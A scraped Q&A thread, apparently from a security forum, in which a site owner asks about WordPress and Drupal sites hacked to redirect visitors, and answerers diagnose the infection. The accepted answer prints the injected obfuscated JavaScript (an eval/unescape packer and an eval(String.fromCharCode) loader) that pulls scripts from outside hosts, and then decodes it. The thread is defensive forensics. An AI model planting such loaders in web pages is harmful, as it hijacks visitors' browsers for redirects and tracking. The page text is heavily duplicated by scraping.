My sites have been hacked by cpamatik.com , it passes all security checks with Google and Sucuri, but still redirects, any idea? [duplicate]

The name of the pictureThe name of the pictureThe name of the pictureClash Royale CLAN TAG#URR8PPP





.everyoneloves__top-leaderboard:empty,.everyoneloves__mid-leaderboard:empty margin-bottom:0;







up vote
4
down vote

favorite
2













This question already has an answer here:



  • How do I deal with a compromised server?

    6 answers



Almost all my sites got hacked by cpamatik.com virus



All CMS were up to date, plugins, modules etc..(Drupal and Wordpress) , some sites I have logged in to work on, but some sites I haven't touched in months, so the hack wasn't inadvertendly inserted from me login in.



My PC is scanned and clean, actually reformated 2 weeks ago.



Hack sites behavior is a redirect on home page and links.



Site in question are:



wearelao.com
xuzo.com
easyrconbar.com and many others...



Security scan on my Namecheap.com hosting spitted this out:



----------- SCAN REPORT -----------
TimeStamp: Tue, 11 Sep 2018 14:20:06 -0400
(/usr/sbin/cxs --nobayes --clamdsock /var/clamd --dbreport --defapache nobody --doptions Mv --exploitscan --nofallback --filemax 50000 --noforce --html --ignore /etc/cxs/cxs.ignore.manual --options mMOLfSGchexdnwZDRru --qoptions Mv --report /home/bruneiab/scanreport-bruneiab-Sep_11_2018_14h20m.txt --sizemax 1000000 --ssl --summary --sversionscan --timemax 30 --unofficial --user bruneiab --virusscan --xtra /etc/cxs/cxs.xtra.manual)

Scanning /home/bruneiab:

'/home/bruneiab/access-logs'
# Symlink to [/usr/local/apache/domlogs/bruneiab]

'/home/bruneiab/.nc_plugin/hidden'
# World writeable directory

'/home/bruneiab/.softaculous/installations.php'
# Universal decode regex match = [universal decoder]

'/home/bruneiab/.trash/civicrm/vendor/phpseclib/phpseclib/phpseclib/Net/SFTP.php'
# Regular expression match = [symlinks*(]

'/home/bruneiab/.trash/civicrm/vendor/symfony/filesystem/Symfony/Component/Filesystem/Filesystem.php'
# Regular expression match = [symlinks*(] and more...


Hosting company have been on this for 24 hours, but the can't seem to be able to fix it...



enter image description here










share|improve this question













marked as duplicate by schroeder♦ Sep 13 at 10:10


This question has been asked before and already has an answer. If those answers do not fully address your question, please ask a new question.














  • What is your question?
    – schroeder♦
    Sep 13 at 10:07










  • Unfortunately, we cannot perform security reviews of your sites or analyse malware for you.
    – schroeder♦
    Sep 13 at 10:10
















up vote
4
down vote

favorite
2













This question already has an answer here:



  • How do I deal with a compromised server?

    6 answers



Almost all my sites got hacked by cpamatik.com virus



All CMS were up to date, plugins, modules etc..(Drupal and Wordpress) , some sites I have logged in to work on, but some sites I haven't touched in months, so the hack wasn't inadvertendly inserted from me login in.



My PC is scanned and clean, actually reformated 2 weeks ago.



Hack sites behavior is a redirect on home page and links.



Site in question are:



wearelao.com
xuzo.com
easyrconbar.com and many others...



Security scan on my Namecheap.com hosting spitted this out:



----------- SCAN REPORT -----------
TimeStamp: Tue, 11 Sep 2018 14:20:06 -0400
(/usr/sbin/cxs --nobayes --clamdsock /var/clamd --dbreport --defapache nobody --doptions Mv --exploitscan --nofallback --filemax 50000 --noforce --html --ignore /etc/cxs/cxs.ignore.manual --options mMOLfSGchexdnwZDRru --qoptions Mv --report /home/bruneiab/scanreport-bruneiab-Sep_11_2018_14h20m.txt --sizemax 1000000 --ssl --summary --sversionscan --timemax 30 --unofficial --user bruneiab --virusscan --xtra /etc/cxs/cxs.xtra.manual)

Scanning /home/bruneiab:

'/home/bruneiab/access-logs'
# Symlink to [/usr/local/apache/domlogs/bruneiab]

'/home/bruneiab/.nc_plugin/hidden'
# World writeable directory

'/home/bruneiab/.softaculous/installations.php'
# Universal decode regex match = [universal decoder]

'/home/bruneiab/.trash/civicrm/vendor/phpseclib/phpseclib/phpseclib/Net/SFTP.php'
# Regular expression match = [symlinks*(]

'/home/bruneiab/.trash/civicrm/vendor/symfony/filesystem/Symfony/Component/Filesystem/Filesystem.php'
# Regular expression match = [symlinks*(] and more...


Hosting company have been on this for 24 hours, but the can't seem to be able to fix it...



enter image description here










share|improve this question













marked as duplicate by schroeder♦ Sep 13 at 10:10


This question has been asked before and already has an answer. If those answers do not fully address your question, please ask a new question.














  • What is your question?
    – schroeder♦
    Sep 13 at 10:07










  • Unfortunately, we cannot perform security reviews of your sites or analyse malware for you.
    – schroeder♦
    Sep 13 at 10:10












up vote
4
down vote

favorite
2









up vote
4
down vote

favorite
2






2






This question already has an answer here:



  • How do I deal with a compromised server?

    6 answers



Almost all my sites got hacked by cpamatik.com virus



All CMS were up to date, plugins, modules etc..(Drupal and Wordpress) , some sites I have logged in to work on, but some sites I haven't touched in months, so the hack wasn't inadvertendly inserted from me login in.



My PC is scanned and clean, actually reformated 2 weeks ago.



Hack sites behavior is a redirect on home page and links.



Site in question are:



wearelao.com
xuzo.com
easyrconbar.com and many others...



Security scan on my Namecheap.com hosting spitted this out:



----------- SCAN REPORT -----------
TimeStamp: Tue, 11 Sep 2018 14:20:06 -0400
(/usr/sbin/cxs --nobayes --clamdsock /var/clamd --dbreport --defapache nobody --doptions Mv --exploitscan --nofallback --filemax 50000 --noforce --html --ignore /etc/cxs/cxs.ignore.manual --options mMOLfSGchexdnwZDRru --qoptions Mv --report /home/bruneiab/scanreport-bruneiab-Sep_11_2018_14h20m.txt --sizemax 1000000 --ssl --summary --sversionscan --timemax 30 --unofficial --user bruneiab --virusscan --xtra /etc/cxs/cxs.xtra.manual)

Scanning /home/bruneiab:

'/home/bruneiab/access-logs'
# Symlink to [/usr/local/apache/domlogs/bruneiab]

'/home/bruneiab/.nc_plugin/hidden'
# World writeable directory

'/home/bruneiab/.softaculous/installations.php'
# Universal decode regex match = [universal decoder]

'/home/bruneiab/.trash/civicrm/vendor/phpseclib/phpseclib/phpseclib/Net/SFTP.php'
# Regular expression match = [symlinks*(]

'/home/bruneiab/.trash/civicrm/vendor/symfony/filesystem/Symfony/Component/Filesystem/Filesystem.php'
# Regular expression match = [symlinks*(] and more...


Hosting company have been on this for 24 hours, but the can't seem to be able to fix it...



enter image description here










share|improve this question














This question already has an answer here:



  • How do I deal with a compromised server?

    6 answers



Almost all my sites got hacked by cpamatik.com virus



All CMS were up to date, plugins, modules etc..(Drupal and Wordpress) , some sites I have logged in to work on, but some sites I haven't touched in months, so the hack wasn't inadvertendly inserted from me login in.



My PC is scanned and clean, actually reformated 2 weeks ago.



Hack sites behavior is a redirect on home page and links.



Site in question are:



wearelao.com
xuzo.com
easyrconbar.com and many others...



Security scan on my Namecheap.com hosting spitted this out:



----------- SCAN REPORT -----------
TimeStamp: Tue, 11 Sep 2018 14:20:06 -0400
(/usr/sbin/cxs --nobayes --clamdsock /var/clamd --dbreport --defapache nobody --doptions Mv --exploitscan --nofallback --filemax 50000 --noforce --html --ignore /etc/cxs/cxs.ignore.manual --options mMOLfSGchexdnwZDRru --qoptions Mv --report /home/bruneiab/scanreport-bruneiab-Sep_11_2018_14h20m.txt --sizemax 1000000 --ssl --summary --sversionscan --timemax 30 --unofficial --user bruneiab --virusscan --xtra /etc/cxs/cxs.xtra.manual)

Scanning /home/bruneiab:

'/home/bruneiab/access-logs'
# Symlink to [/usr/local/apache/domlogs/bruneiab]

'/home/bruneiab/.nc_plugin/hidden'
# World writeable directory

'/home/bruneiab/.softaculous/installations.php'
# Universal decode regex match = [universal decoder]

'/home/bruneiab/.trash/civicrm/vendor/phpseclib/phpseclib/phpseclib/Net/SFTP.php'
# Regular expression match = [symlinks*(]

'/home/bruneiab/.trash/civicrm/vendor/symfony/filesystem/Symfony/Component/Filesystem/Filesystem.php'
# Regular expression match = [symlinks*(] and more...


Hosting company have been on this for 24 hours, but the can't seem to be able to fix it...



enter image description here





This question already has an answer here:



  • How do I deal with a compromised server?

    6 answers







account-security web-hosting






share|improve this question













share|improve this question











share|improve this question




share|improve this question










asked Sep 13 at 3:30









Bruno Vincent

1265




1265




marked as duplicate by schroeder♦ Sep 13 at 10:10


This question has been asked before and already has an answer. If those answers do not fully address your question, please ask a new question.






marked as duplicate by schroeder♦ Sep 13 at 10:10


This question has been asked before and already has an answer. If those answers do not fully address your question, please ask a new question.













  • What is your question?
    – schroeder♦
    Sep 13 at 10:07










  • Unfortunately, we cannot perform security reviews of your sites or analyse malware for you.
    – schroeder♦
    Sep 13 at 10:10
















  • What is your question?
    – schroeder♦
    Sep 13 at 10:07










  • Unfortunately, we cannot perform security reviews of your sites or analyse malware for you.
    – schroeder♦
    Sep 13 at 10:10















What is your question?
– schroeder♦
Sep 13 at 10:07




What is your question?
– schroeder♦
Sep 13 at 10:07












Unfortunately, we cannot perform security reviews of your sites or analyse malware for you.
– schroeder♦
Sep 13 at 10:10




Unfortunately, we cannot perform security reviews of your sites or analyse malware for you.
– schroeder♦
Sep 13 at 10:10










3 Answers
3






active

oldest

votes

















up vote
18
down vote



accepted










I found these javascript on the compromised sites.



<script type="text/javascript" async="" src="https://ads.voipnewswire.net/ad.js"></script>

<script type="text/javascript"><![CDATA[eval(unescape("eval%28function%28p%2Ca%2Cc%2Ck%2Ce%2Cr%29%7Be%3Dfunction%28c%29%7Breturn%28c%3Ca%3F%27%27%3Ae%28parseInt%28c/a%29%29%29+%28%28c%3Dc%25a%29%3E35%3FString.fromCharCode%28c+29%29%3Ac.toString%2836%29%29%7D%3Bif%28%21%27%27.replace%28/%5E/%2CString%29%29%7Bwhile%28c--%29r%5Be%28c%29%5D%3Dk%5Bc%5D%7C%7Ce%28c%29%3Bk%3D%5Bfunction%28e%29%7Breturn%20r%5Be%5D%7D%5D%3Be%3Dfunction%28%29%7Breturn%27%5C%5Cw+%27%7D%3Bc%3D1%7D%3Bwhile%28c--%29if%28k%5Bc%5D%29p%3Dp.replace%28new%20RegExp%28%27%5C%5Cb%27+e%28c%29+%27%5C%5Cb%27%2C%27g%27%29%2Ck%5Bc%5D%29%3Breturn%20p%7D%28%276%207%28a%2Cb%29%7Bn%7B4%282.9%29%7B3%20c%3D2.9%28%22o%22%29%3Bc.p%28b%2Cf%2Cf%29%3Ba.q%28c%29%7Dg%7B3%20c%3D2.r%28%29%3Ba.s%28%5C%27t%5C%27+b%2Cc%29%7D%7Du%28e%29%7B%7D%7D6%20h%28a%29%7B4%28a.8%29a%3Da.8%3B4%28a%3D%3D%5C%27%5C%27%29v%3B3%20b%3Da.w%28%5C%27%7C%5C%27%29%5B1%5D%3B3%20c%3B3%20d%3D2.x%28%5C%27y%5C%27%29%3Bz%283%20i%3D0%3Bi%3Cd.5%3Bi++%294%28d%5Bi%5D.A%3D%3D%5C%27B-C-D%5C%27%29c%3Dd%5Bi%5D%3B4%282.j%28%5C%27k%5C%27%29%3D%3DE%7C%7C2.j%28%5C%27k%5C%27%29.l.5%3D%3D0%7C%7Cc.5%3D%3D0%7C%7Cc.l.5%3D%3D0%29%7BF%286%28%29%7Bh%28a%29%7D%2CG%29%7Dg%7Bc.8%3Db%3B7%28c%2C%5C%27m%5C%27%29%3B7%28c%2C%5C%27m%5C%27%29%7D%7D%27%2C43%2C43%2C%27%7C%7Cdocument%7Cvar%7Cif%7Clength%7Cfunction%7CGTranslateFireEvent%7Cvalue%7CcreateEvent%7C%7C%7C%7C%7C%7Ctrue%7Celse%7CdoGTranslate%7C%7CgetElementById%7Cgoogle_translate_element2%7CinnerHTML%7Cchange%7Ctry%7CHTMLEvents%7CinitEvent%7CdispatchEvent%7CcreateEventObject%7CfireEvent%7Con%7Ccatch%7Creturn%7Csplit%7CgetElementsByTagName%7Cselect%7Cfor%7CclassName%7Cgoog%7Cte%7Ccombo%7Cnull%7CsetTimeout%7C500%27.split%28%27%7C%27%29%2C0%2C%7B%7D%29%29"))/* ]]> */</script>

<script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 101, 108, 101, 109, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 101, 108, 101, 109, 46, 116, 121, 112, 101, 32, 61, 32, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 32, 101, 108, 101, 109, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 101, 108, 101, 109, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 57, 55, 44, 32, 49, 48, 48, 44, 32, 49, 49, 53, 44, 32, 52, 54, 44, 32, 49, 49, 56, 44, 32, 49, 49, 49, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 57, 44, 32, 49, 49, 53, 44, 32, 49, 49, 57, 44, 32, 49, 48, 53, 44, 32, 49, 49, 52, 44, 32, 49, 48, 49, 44, 32, 52, 54, 44, 32, 49, 49, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 54, 44, 32, 52, 55, 44, 32, 57, 55, 44, 32, 49, 48, 48, 44, 32, 52, 54, 44, 32, 49, 48, 54, 44, 32, 49, 49, 53, 41, 59, 32, 32, 32, 118, 97, 114, 32, 97, 108, 108, 115, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 118, 97, 114, 32, 110, 116, 51, 32, 61, 32, 116, 114, 117, 101, 59, 32, 102, 111, 114, 32, 40, 32, 118, 97, 114, 32, 105, 32, 61, 32, 97, 108, 108, 115, 46, 108, 101, 110, 103, 116, 104, 59, 32, 105, 45, 45, 59, 41, 32, 123, 32, 105, 102, 32, 40, 97, 108, 108, 115, 91, 105, 93, 46, 115, 114, 99, 46, 105, 110, 100, 101, 120, 79, 102, 40, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 56, 44, 32, 49, 49, 49, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 57, 44, 32, 49, 49, 53, 44, 32, 49, 49, 57, 44, 32, 49, 48, 53, 44, 32, 49, 49, 52, 44, 32, 49, 48, 49, 41, 41, 32, 62, 32, 45, 49, 41, 32, 123, 32, 110, 116, 51, 32, 61, 32, 102, 97, 108, 115, 101, 59, 125, 32, 125, 32, 105, 102, 40, 110, 116, 51, 32, 61, 61, 32, 116, 114, 117, 101, 41, 123, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 34, 104, 101, 97, 100, 34, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 101, 108, 101, 109, 41, 59, 32, 125));</script>


The last one translates to



var elem = document.createElement('script');
elem.type = 'text/javascript';
elem.async = true;
elem.src = 'https://ads.voipnewswire.net/ad.js';
var alls = document.getElementsByTagName('script');
var nt3 = true;
for (var i = alls.length; i--;)
if (alls[i].src.indexOf('voipnewswire') > -1)
nt3 = false;


if (nt3 == true)
document.getElementsByTagName("head")[0].appendChild(elem);



The ad.js is



var _paq = _paq || ;
_paq.push(['trackPageView']);
_paq.push(['enableLinkTracking']);
var u="https://voipnewswire.innocraft.cloud/";
_paq.push(['setTrackerUrl', u+'piwik.php']);
_paq.push(['setSiteId', '1']);
var d=document, g=d.createElement('script'),
s=d.getElementsByTagName('script')[0];
g.type='text/javascript'; g.async=true; g.defer=true; g.src=u+'piwik.js';
s.parentNode.insertBefore(g,s);
var cloudscr = document.createElement('script'); cloudscr.type = 'text/javascript'; cloudscr.src = https://glasssunshine.cf/glcf.js; cloudscr.async = true; document.getElementsByTagName("head")[0].appendChild(cloudscr);


Which ultimately leads to ads and tracking javascript, https://voipnewswire.innocraft.cloud/piwik.js



These codes are the problem. You can delete these from the templates of your CMSes.



But I would strongly recommend to just back everything up and start from the clean slate because I suspect that your server/hosting provider is compromised or in control of the attacker.






share|improve this answer






















  • Wow! In what files can I find this code? A whole security team can't figure this out for 24 hours and you find it in 5 minutes? Man, you are brilliant!
    – Bruno Vincent
    Sep 13 at 5:46






  • 19




    @BrunoVincent It will be in the main/base template of the CMS. You really need some re-consideration about that security team.
    – Moonsik Park
    Sep 13 at 5:49







  • 1




    It has a tracking javascript so ad appearance may vary based on their choices. Please select my answer if it helped.
    – Moonsik Park
    Sep 13 at 5:59







  • 3




    @BrunoVincent Virus scanners aren't magic - the code is perfectly valid, not really suspicious, it just does something you don't want it to do. The only real weird thing is that it's obviously trying to go around sanitization (note the multiple encodings trying to do the same thing; this is probably meant to be injected through e.g. your comments section), but there's plenty of legitimate reasons for doing things like that. In the end, the injected code isn't really different from what e.g. Google Ads do.
    – Luaan
    Sep 13 at 8:10






  • 2




    Removing malicious files does very little to fix the problem. Finding and identifying the source of the infection and starting from scratch (aka the duplicate this question is now linked to) is the only answer. Removing these files and then reloading from a clean backup will result in the site being reinfected in 5 minutes if the original source is not understood
    – Conor Mancone
    Sep 13 at 11:28

















up vote
0
down vote













Just to @Moonsik Park answer : You can use Browser developer mode redirect log preservation features to locate which script do the redirect.



  • In Google developer mode, it is a "Preserve log" checkbox under network

  • In firefox developer mode, it is a "Persist Logs"checkbox under network

Take the compromised xuzo.com as example, open the website in browser developer mode and the log presrevation enabled, you can see something like following before it jump to another website



https://ads.voipnewswire.net/ad.js initiator is 
http://xuzo.com/sites/default/files/js/js_5yveJEfYnvdHe_DxshzrVq3ttzeNp-8Ai8MVx1bt2eo.js


Open the file, you will see something like this in the header



eval(String.fromCharCode(118, 97, 114, 32, 10....


Unfortunately, String.fromCharCode is legitimate Javascript code and frequently used by many website to hide info such as email address from spammer. I doubt security software can use String.fromCharCode as a reason to locate the bad code without generate a lot of false alarm.



However, if you never use such code, a simple fgrep will help you locate the files, e.g.



frep -lR 'fromCharCode' '/path/to/cms/'





share|improve this answer




















  • Thats sounds good, I think I never use such code, these are just Drupal and Worpress sites, how do I run the fgrep, I use Cpanel, is it a simple find and replace?
    – Bruno Vincent
    Sep 13 at 9:30










  • Additionally, it seems the scripts load randomly, only on first page load, second time around the script doesn;t always run, so seems it's made to load randomly or for first time load? So the hosting company thinks it's fixed, but it's not...;(
    – Bruno Vincent
    Sep 13 at 9:31










  • @BrunoVincent I think you should focus on stuff that store inside /sites/default/files/js/. If you cannot find anything there, then you need to check drupal code or web server and see alias path mapping to that path.
    – mootmoot
    Sep 13 at 9:41

















up vote
0
down vote













I had the same problem a few days ago. More than 15 sites were affected. I installed the "Better Search and Replace" plugin to search for the specific javascript. Then I removed the code (using the replace function) and it seemed to do the job. However, I'm investigating how "they" succeeded in injecting the code.






share|improve this answer






















  • But these were wordpress sites right? Who are you hosting with also? Mine is with namecheap.com, did you touch any sites, were all your installations up to date?
    – Bruno Vincent
    Sep 13 at 9:35











  • Just search your wordpress version for vulnerabilities. But I will suggest back up everything and install a patched CMS.
    – mootmoot
    Sep 13 at 10:18

















3 Answers
3






active

oldest

votes








3 Answers
3






active

oldest

votes









active

oldest

votes






active

oldest

votes








up vote
18
down vote



accepted










I found these javascript on the compromised sites.



<script type="text/javascript" async="" src="https://ads.voipnewswire.net/ad.js"></script>

<script type="text/javascript"><![CDATA[eval(unescape("eval%28function%28p%2Ca%2Cc%2Ck%2Ce%2Cr%29%7Be%3Dfunction%28c%29%7Breturn%28c%3Ca%3F%27%27%3Ae%28parseInt%28c/a%29%29%29+%28%28c%3Dc%25a%29%3E35%3FString.fromCharCode%28c+29%29%3Ac.toString%2836%29%29%7D%3Bif%28%21%27%27.replace%28/%5E/%2CString%29%29%7Bwhile%28c--%29r%5Be%28c%29%5D%3Dk%5Bc%5D%7C%7Ce%28c%29%3Bk%3D%5Bfunction%28e%29%7Breturn%20r%5Be%5D%7D%5D%3Be%3Dfunction%28%29%7Breturn%27%5C%5Cw+%27%7D%3Bc%3D1%7D%3Bwhile%28c--%29if%28k%5Bc%5D%29p%3Dp.replace%28new%20RegExp%28%27%5C%5Cb%27+e%28c%29+%27%5C%5Cb%27%2C%27g%27%29%2Ck%5Bc%5D%29%3Breturn%20p%7D%28%276%207%28a%2Cb%29%7Bn%7B4%282.9%29%7B3%20c%3D2.9%28%22o%22%29%3Bc.p%28b%2Cf%2Cf%29%3Ba.q%28c%29%7Dg%7B3%20c%3D2.r%28%29%3Ba.s%28%5C%27t%5C%27+b%2Cc%29%7D%7Du%28e%29%7B%7D%7D6%20h%28a%29%7B4%28a.8%29a%3Da.8%3B4%28a%3D%3D%5C%27%5C%27%29v%3B3%20b%3Da.w%28%5C%27%7C%5C%27%29%5B1%5D%3B3%20c%3B3%20d%3D2.x%28%5C%27y%5C%27%29%3Bz%283%20i%3D0%3Bi%3Cd.5%3Bi++%294%28d%5Bi%5D.A%3D%3D%5C%27B-C-D%5C%27%29c%3Dd%5Bi%5D%3B4%282.j%28%5C%27k%5C%27%29%3D%3DE%7C%7C2.j%28%5C%27k%5C%27%29.l.5%3D%3D0%7C%7Cc.5%3D%3D0%7C%7Cc.l.5%3D%3D0%29%7BF%286%28%29%7Bh%28a%29%7D%2CG%29%7Dg%7Bc.8%3Db%3B7%28c%2C%5C%27m%5C%27%29%3B7%28c%2C%5C%27m%5C%27%29%7D%7D%27%2C43%2C43%2C%27%7C%7Cdocument%7Cvar%7Cif%7Clength%7Cfunction%7CGTranslateFireEvent%7Cvalue%7CcreateEvent%7C%7C%7C%7C%7C%7Ctrue%7Celse%7CdoGTranslate%7C%7CgetElementById%7Cgoogle_translate_element2%7CinnerHTML%7Cchange%7Ctry%7CHTMLEvents%7CinitEvent%7CdispatchEvent%7CcreateEventObject%7CfireEvent%7Con%7Ccatch%7Creturn%7Csplit%7CgetElementsByTagName%7Cselect%7Cfor%7CclassName%7Cgoog%7Cte%7Ccombo%7Cnull%7CsetTimeout%7C500%27.split%28%27%7C%27%29%2C0%2C%7B%7D%29%29"))/* ]]> */</script>

<script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 101, 108, 101, 109, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 101, 108, 101, 109, 46, 116, 121, 112, 101, 32, 61, 32, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 32, 101, 108, 101, 109, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 101, 108, 101, 109, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 57, 55, 44, 32, 49, 48, 48, 44, 32, 49, 49, 53, 44, 32, 52, 54, 44, 32, 49, 49, 56, 44, 32, 49, 49, 49, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 57, 44, 32, 49, 49, 53, 44, 32, 49, 49, 57, 44, 32, 49, 48, 53, 44, 32, 49, 49, 52, 44, 32, 49, 48, 49, 44, 32, 52, 54, 44, 32, 49, 49, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 54, 44, 32, 52, 55, 44, 32, 57, 55, 44, 32, 49, 48, 48, 44, 32, 52, 54, 44, 32, 49, 48, 54, 44, 32, 49, 49, 53, 41, 59, 32, 32, 32, 118, 97, 114, 32, 97, 108, 108, 115, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 118, 97, 114, 32, 110, 116, 51, 32, 61, 32, 116, 114, 117, 101, 59, 32, 102, 111, 114, 32, 40, 32, 118, 97, 114, 32, 105, 32, 61, 32, 97, 108, 108, 115, 46, 108, 101, 110, 103, 116, 104, 59, 32, 105, 45, 45, 59, 41, 32, 123, 32, 105, 102, 32, 40, 97, 108, 108, 115, 91, 105, 93, 46, 115, 114, 99, 46, 105, 110, 100, 101, 120, 79, 102, 40, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 56, 44, 32, 49, 49, 49, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 57, 44, 32, 49, 49, 53, 44, 32, 49, 49, 57, 44, 32, 49, 48, 53, 44, 32, 49, 49, 52, 44, 32, 49, 48, 49, 41, 41, 32, 62, 32, 45, 49, 41, 32, 123, 32, 110, 116, 51, 32, 61, 32, 102, 97, 108, 115, 101, 59, 125, 32, 125, 32, 105, 102, 40, 110, 116, 51, 32, 61, 61, 32, 116, 114, 117, 101, 41, 123, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 34, 104, 101, 97, 100, 34, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 101, 108, 101, 109, 41, 59, 32, 125));</script>


The last one translates to



var elem = document.createElement('script');
elem.type = 'text/javascript';
elem.async = true;
elem.src = 'https://ads.voipnewswire.net/ad.js';
var alls = document.getElementsByTagName('script');
var nt3 = true;
for (var i = alls.length; i--;)
if (alls[i].src.indexOf('voipnewswire') > -1)
nt3 = false;


if (nt3 == true)
document.getElementsByTagName("head")[0].appendChild(elem);



The ad.js is



var _paq = _paq || ;
_paq.push(['trackPageView']);
_paq.push(['enableLinkTracking']);
var u="https://voipnewswire.innocraft.cloud/";
_paq.push(['setTrackerUrl', u+'piwik.php']);
_paq.push(['setSiteId', '1']);
var d=document, g=d.createElement('script'),
s=d.getElementsByTagName('script')[0];
g.type='text/javascript'; g.async=true; g.defer=true; g.src=u+'piwik.js';
s.parentNode.insertBefore(g,s);
var cloudscr = document.createElement('script'); cloudscr.type = 'text/javascript'; cloudscr.src = https://glasssunshine.cf/glcf.js; cloudscr.async = true; document.getElementsByTagName("head")[0].appendChild(cloudscr);


Which ultimately leads to ads and tracking javascript, https://voipnewswire.innocraft.cloud/piwik.js



These codes are the problem. You can delete these from the templates of your CMSes.



But I would strongly recommend to just back everything up and start from the clean slate because I suspect that your server/hosting provider is compromised or in control of the attacker.






share|improve this answer






















  • Wow! In what files can I find this code? A whole security team can't figure this out for 24 hours and you find it in 5 minutes? Man, you are brilliant!
    – Bruno Vincent
    Sep 13 at 5:46






  • 19




    @BrunoVincent It will be in the main/base template of the CMS. You really need some re-consideration about that security team.
    – Moonsik Park
    Sep 13 at 5:49







  • 1




    It has a tracking javascript so ad appearance may vary based on their choices. Please select my answer if it helped.
    – Moonsik Park
    Sep 13 at 5:59







  • 3




    @BrunoVincent Virus scanners aren't magic - the code is perfectly valid, not really suspicious, it just does something you don't want it to do. The only real weird thing is that it's obviously trying to go around sanitization (note the multiple encodings trying to do the same thing; this is probably meant to be injected through e.g. your comments section), but there's plenty of legitimate reasons for doing things like that. In the end, the injected code isn't really different from what e.g. Google Ads do.
    – Luaan
    Sep 13 at 8:10






  • 2




    Removing malicious files does very little to fix the problem. Finding and identifying the source of the infection and starting from scratch (aka the duplicate this question is now linked to) is the only answer. Removing these files and then reloading from a clean backup will result in the site being reinfected in 5 minutes if the original source is not understood
    – Conor Mancone
    Sep 13 at 11:28














up vote
18
down vote



accepted










I found these javascript on the compromised sites.



<script type="text/javascript" async="" src="https://ads.voipnewswire.net/ad.js"></script>

